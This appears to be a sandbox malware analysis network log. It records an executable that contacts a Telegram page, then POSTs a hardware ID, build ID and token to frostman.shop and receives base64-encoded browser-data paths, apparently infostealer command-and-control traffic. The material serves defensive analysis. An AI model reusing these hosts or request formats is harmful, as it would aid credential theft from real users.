                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.711071968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.717295885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.717334032 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.717451096 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.717803001 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:14.725215912 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.042414904 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.048151016 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.048187971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.048309088 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.048440933 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.055775881 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.375260115 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.382427931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.382481098 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.382509947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.382755041 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.389889002 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.708364010 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.713979959 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.714035988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.714066982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.714509964 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:15.722115993 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.036561012 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.041798115 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.041853905 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.041882992 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.042097092 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.049627066 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.364006996 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.370573997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.370606899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.370701075 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.371509075 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.380415916 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.694787979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.700535059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.700572968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.700624943 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.700860023 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:16.708841085 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.023219109 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.029818058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.029886961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.029921055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.030183077 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.037626028 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.461108923 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.461226940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.461711884 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.464818001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.464854956 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.472616911 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.788151979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.793845892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.793876886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.793992043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.794159889 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:17.801347971 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.115947008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.122328043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.122365952 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.122461081 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.122642040 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.129285097 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.443797112 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.449095964 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.449184895 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.449286938 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.449404955 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.456754923 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.771384001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.776918888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:18.777199984 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.570399046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.570687056 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.579896927 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.894085884 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.899669886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.899708033 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.899956942 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.900150061 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:24.908471107 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.222956896 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.230814934 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.230870008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.230957985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.231352091 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.242841005 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.557152987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.564018965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.564075947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.564105034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.564327955 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.571954012 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.886466980 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.892102003 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.892133951 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.892198086 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.892466068 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:25.908667088 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.225763083 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.231414080 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.231447935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.231477022 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.233846903 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.241236925 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.555515051 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.561038971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.561069965 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.561098099 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.561450005 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.579068899 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.897120953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.906877041 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.906924963 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.906959057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.907176971 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:26.917341948 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.231734037 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.241369009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.241465092 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.241498947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.241787910 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.252358913 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.567214966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.572132111 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.572164059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.572191954 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.572525024 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.579710960 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.894042015 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.900121927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.900157928 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.900285006 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.900474072 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:27.908695936 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.223330021 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.244193077 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.244376898 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.244421959 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.244587898 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.252137899 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.572577953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.579549074 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.579582930 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.579674006 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.579863071 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.587517977 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.924165010 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.946438074 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.946829081 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:28.947011948 CET4436501423.209.72.43192.168.2.6
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 20, 2024 07:31:33.654719114 CET | 192.168.2.6 | 1.1.1.1 | c2ce | (Port unreachable) | Destination Unreachable
Dec 20, 2024 07:31:34.464772940 CET | 192.168.2.6 | 1.1.1.1 | c2b9 | (Port unreachable) | Destination Unreachable
Dec 20, 2024 07:32:38.300889015 CET | 192.168.2.6 | 1.1.1.1 | c29a | (Port unreachable) | Destination Unreachable
• t.me
• frostman.shop
• tse1.mm.bing.net
• www.google.com
• chrome.cloudflare-dns.com
• clients2.googleusercontent.com
• https:
  • assets.msn.com
  • c.msn.com
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port
0 | 192.168.2.6 | 49707 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:30:55 UTC | 71 | OUT
Data Ascii: CNT 1 CON 305
MS-CV: sLTruaPq6kymzS4w.1
Context: b9148bb6b1de0a8c
2024-12-20 06:30:55 UTC | 249 | OUT
Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:30:55 UTC | 1084 | OUT
Data Ascii: ATH 2 CON\DEVICE 1061
MS-CV: sLTruaPq6kymzS4w.2
Context: b9148bb6b1de0a8c
<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:30:55 UTC | 74 | OUT
Data Ascii: BND 3 CON\QOS 56
MS-CV: sLTruaPq6kymzS4w.3
Context: b9148bb6b1de0a8c
2024-12-20 06:30:56 UTC | 14 | IN
Data Ascii: 202 1 CON 58
2024-12-20 06:30:56 UTC | 58 | IN
Data Ascii: MS-CV: TbeUYjdmmUK/ckZstZRXPQ.0
Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 149.154.167.99 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:00 UTC | 85 | OUT
GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:01 UTC | 511 | IN
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 20 Dec 2024 06:31:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12304
Connection: close
Set-Cookie: stel_ssid=1d53b76550f7305fa2_9748456401523359847; expires=Sat, 21 Dec 2024 06:31:01 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-20 06:31:01 UTC | 12304 | IN
Data Ascii: <!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Telegram: Contact @k04ael</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49715 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:03 UTC | 233 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:04 UTC | 158 | IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:04 UTC | 5 | IN
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.6 | 49714 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:04 UTC | 71 | OUT
Data Ascii: CNT 1 CON 305
MS-CV: bgmoTXAMP0KwwlZi.1
Context: 9aa121f54c9a2889
2024-12-20 06:31:04 UTC | 249 | OUT
Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:31:04 UTC | 1084 | OUT
Data Ascii: ATH 2 CON\DEVICE 1061
MS-CV: bgmoTXAMP0KwwlZi.2
Context: 9aa121f54c9a2889
<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:31:04 UTC | 218 | OUT
Data Ascii: BND 3 CON\WNS 0 197
MS-CV: bgmoTXAMP0KwwlZi.3
Context: 9aa121f54c9a2889
<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-20 06:31:04 UTC | 14 | IN
Data Ascii: 202 1 CON 58
2024-12-20 06:31:04 UTC | 58 | IN
Data Ascii: MS-CV: Q4nG39j05E+Trj+r04of9g.0
Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49716 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:05 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:05 UTC | 256 | OUT
Data Ascii:
------M7YMGDTJM7G47Q16P8YU
Content-Disposition: form-data; name="hwid"

9C66AF6B35482604982160-a33c7340-61ca
------M7YMGDTJM7G47Q16P8YU
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------M7YMGDTJM7G47Q16P8YU--
2024-12-20 06:31:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:06 UTC | 69 | IN
Data Ascii:
3a
1|1|1|1|889f5f40738c5dc3f18f9676ef06948f|1|1|1|0|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49722 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:08 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----2VSJ5XLFCBIE3E3WLFK6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:08 UTC | 331 | OUT
Data Ascii:
------2VSJ5XLFCBIE3E3WLFK6
Content-Disposition: form-data; name="token"

889f5f40738c5dc3f18f9676ef06948f
------2VSJ5XLFCBIE3E3WLFK6
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------2VSJ5XLFCBIE3E3WLFK6
Cont
2024-12-20 06:31:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:09 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.6 | 49721 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:08 UTC | 71 | OUT
Data Ascii:
CNT 1 CON 305
MS-CV: 65BlAZWe60uM1KYn.1
Context: 11156ec307882a6d
2024-12-20 06:31:08 UTC | 249 | OUT
Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:31:08 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 65BlAZWe60uM1KYn.2Context: 11156ec307882a6d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:31:08 UTC | 74 | OUT
Data Ascii:
BND 3 CON\QOS 56
MS-CV: 65BlAZWe60uM1KYn.3
Context: 11156ec307882a6d
2024-12-20 06:31:09 UTC | 14 | IN
Data Ascii: 202 1 CON 58
2024-12-20 06:31:09 UTC | 58 | IN
Data Ascii:
MS-CV: l7GoFJGQmUucHOOyDhhXSg.0

Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49729 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:10 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6PZUASRIWTRIE3O8Q9HV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:10 UTC | 331 | OUT
Data Ascii:
------6PZUASRIWTRIE3O8Q9HV
Content-Disposition: form-data; name="token"

889f5f40738c5dc3f18f9676ef06948f
------6PZUASRIWTRIE3O8Q9HV
Content-Disposition: form-data; name="build_id"

d3e426b319e78f89e66d1acb7676d093
------6PZUASRIWTRIE3O8Q9HV
Cont
2024-12-20 06:31:11 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:11 UTC | 5837 | IN
